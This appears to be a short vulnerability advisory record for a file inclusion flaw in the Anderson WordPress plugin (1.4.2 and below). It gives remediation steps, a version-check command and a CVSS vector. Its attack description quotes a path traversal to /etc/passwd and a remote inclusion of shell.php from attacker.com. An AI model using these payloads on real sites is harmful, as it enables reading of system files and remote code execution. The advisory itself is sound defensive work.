AncoraThemes Anderson plugin version 1.4.2 and below
Attacker manipulates file path parameters in URL (e.g., ?include=../../etc/passwd or ?file=http://attacker.com/shell.php) to execute arbitrary PHP code or read sensitive files
Update Anderson plugin to version > 1.4.2; implement strict input validation and file path whitelist; disable remote file inclusion in php.ini (allow_url_include=Off)
플러그인이 존재하고 버전 번호가 1.4.2 이하면 취약함; 1.4.3 이상이면 안전
find /var/www/html/wp-content/plugins -type d -name '*anderson*' 2>/dev/null && grep -r 'Version' /var/www/html/wp-content/plugins/anderson*/readme.txt 2>/dev/null | grep -oE '[0-9]+\.[0-9]+\.[0-9]+'
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H